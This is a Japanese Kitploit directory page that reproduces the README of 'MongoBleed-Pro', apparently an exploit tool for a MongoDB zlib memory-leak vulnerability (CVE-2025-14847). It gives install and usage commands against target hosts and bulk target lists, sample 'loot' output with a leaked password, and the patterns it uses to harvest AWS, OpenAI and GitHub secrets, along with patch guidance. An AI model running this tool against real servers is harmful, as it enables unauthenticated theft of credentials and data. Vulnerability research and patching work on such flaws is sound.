Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-14847_Expolit — MongoDBのzlib圧縮処理における重大なメモリ情報漏洩脆弱性です。このツールにより、セキュリティ研究者は脆弱なMongoDBインスタンスから機密データを抽出できます。 | Kitploit
ツール/GitHubGitHub/cybertechajju/cve-2025-14847_expolit
メモリフォレンジック脆弱性分析エクスプロイトデータ流出情報収集ペネトレーションテストシークレット検出学習と教育データベースセキュリティ
GitHubcybertechajju/cve-2025-14847_expolit

CVE-2025-14847_Expolit

MongoDBのzlib圧縮処理における重大なメモリ情報漏洩脆弱性です。このツールにより、セキュリティ研究者は脆弱なMongoDBインスタンスから機密データを抽出できます。

3337ヶ月前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
リポジトリを見る

MongoBleed-Pro ☠️

CVE Python License Status

高度なMongoDBメモリリーク悪用ツール
Keep Learning | Keep Hacking with CyberTechAjju


🔥 概要

MongoBleed-Pro は CVE-2025-14847(MongoDBのzlib圧縮処理における重大なメモリ開示脆弱性)の高度な悪用ツールです。このツールにより、セキュリティ研究者は脆弱なMongoDBインスタンスから機密データを抽出できます。

⚠️ 免責事項

このツールは許可されたセキュリティテストおよび教育目的のみを意図しています。コンピュータシステムへの不正アクセスは違法です。テスト前に必ず適切な承認を得てください。


💀 脆弱性の詳細

プロパティ詳細
CVE IDCVE-2025-14847
脆弱性タイプメモリ開示
影響を受けるバージョンMongoDB < 8.0.10, < 7.3.6, < 7.0.19, < 6.0.23
根本原因zlib解凍時のバッファオーバーリード
影響認証不要のリモートメモリリーク

🚀 機能

  • ☠️ ハッカースタイルUI - アニメーション付きエリート端末インターフェース
  • ⚡ マルチスレッドスキャン - 設定可能なスレッド数で高速メモリ抽出
  • 🎯 自動脆弱性検出 - 悪用前に自動で脆弱性チェック
  • 🔑 秘密パターン検出 - AWSキー、APIトークン、パスワード、メールアドレスを検出
  • 📊 リアルタイム進捗 - メモリリークのライブ可視化
  • 💾 データエクスポート - 抽出データをファイルに保存して分析
  • 🌐 一括スキャン - ファイルから複数ターゲットをスキャン

📦 インストール

root@kitploit:~
# リポジトリをクローン
git clone https://github.com/cybertechajju/CVE-2025-14847_Expolit.git
cd CVE-2025-14847_Expolit

# 依存関係をインストール
pip install -r requirements.txt

🎮 使用方法

基本使用法

root@kitploit:~
python3 mongobleed_pro.py

特定のホストを指定

root@kitploit:~
python3 mongobleed_pro.py --target 192.168.1.100

カスタムポート

root@kitploit:~
python3 mongobleed_pro.py --target 192.168.1.100:27018

一括スキャン

root@kitploit:~
python3 mongobleed_pro.py --file targets.txt

高度なオプション

root@kitploit:~
python3 mongobleed_pro.py --target 192.168.1.100 --threads 100 --min-offset 100 --max-offset 20000

全オプション


📸 スクリーンショット

root@kitploit:~
╔══════════════════════════════════════════════════════════════╗
║  💀 メモリ抽出シーケンス開始 💀                              ║
╚══════════════════════════════════════════════════════════════╝

⚡ ターゲット捕捉: 192.168.1.100:27017
   ✓ ポートOPEN
   ☠️  脆弱!攻撃開始...

  ◉ 0x0E31 │ nr_inactive_anon 134420\nnr_active_anon 110832...
  ☠️  戦利品獲得: 🔐 パスワード
      → admin_pass=SuperSecret123

╔══════════════════ 抽出完了 ══════════════════╗
║  💾 抽出バイト数: 125,847
║  📦 ユニークフラグメント: 342
║  🔑 発見された秘密: 5
╚══════════════════════════════════════════════════════════╝

🔑 検出される秘密の種類

  • 🔑 AWSアクセスキー (AKIA...)
  • 🤖 OpenAI APIキー (sk-...)
  • 🐙 GitHubトークン (ghp_...)
  • 🔐 パスワードと秘密
  • 📧 メールアドレス

📁 出力ファイル

ファイル説明
loot_<host>.txt抽出された秘密(読み取り可能形式)
dump_<host>.bin手動分析用の生メモリダンプ

🛡️ 緩和策

MongoDB管理者の場合は、パッチ適用済みバージョンに更新してください:

  • MongoDB 8.0.10以上
  • MongoDB 7.3.6以上
  • MongoDB 7.0.19以上
  • MongoDB 6.0.23以上

👤 作者

CyberTechAjju

  • 🐦 Twitter: @CyberTechAjju

📜 ライセンス

このプロジェクトはMITライセンスの下でライセンスされています。詳細はLICENSEファイルを参照してください。


⭐ サポート

このツールが役に立った場合は、GitHubで⭐をお願いします!


「 Keep Learning | Keep Hacking 」
Made with ❤️ by CyberTechAjju

ツールをダウンロード
引数説明デフォルト値
--targetターゲットIP/URL対話型プロンプト
--fileターゲットリストのファイルなし
--threadsスレッド数50
--min-offset最小メモリオフセット20
--max-offset最大メモリオフセット8192